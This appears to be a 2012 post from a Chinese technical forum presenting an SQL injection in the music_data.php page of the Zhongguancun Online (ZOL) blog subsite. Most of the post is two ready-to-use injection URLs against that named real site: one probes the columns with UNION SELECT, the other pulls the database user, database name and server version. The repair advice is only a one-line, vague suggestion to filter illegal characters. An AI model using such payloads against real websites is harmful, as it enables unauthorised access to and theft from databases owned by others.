琼殿技术论坛

琼殿技术论坛»首页 › IT技术/使用交流 › 电脑病毒论坛 › 中关村在线博客子站SQL注入及修复方案

返回列表发新帖

查看: 54|回复: 0

[漏洞分析] 中关村在线博客子站SQL注入及修复方案

从百草园干到三味书屋

3 主题	0 回帖	0 积分

金币: 0
阅读权限: 220
精华: 0
威望: 0
贡献: 0
在线时间: 0 小时
注册时间: 2009-11-26

发消息

发表于 2012-7-7 17:55:25 | 显示全部楼层 |阅读模式

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--

修复方案：
过滤参数提交非法字符或者拦截敏感字符等等。。。

回复

使用道具举报

返回列表发新帖

Archiver|手机版|小黑屋|琼殿技术论坛 |nimba_sitemap:appname

相关侵权、举报、投诉及建议等，请发 E-mail：qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部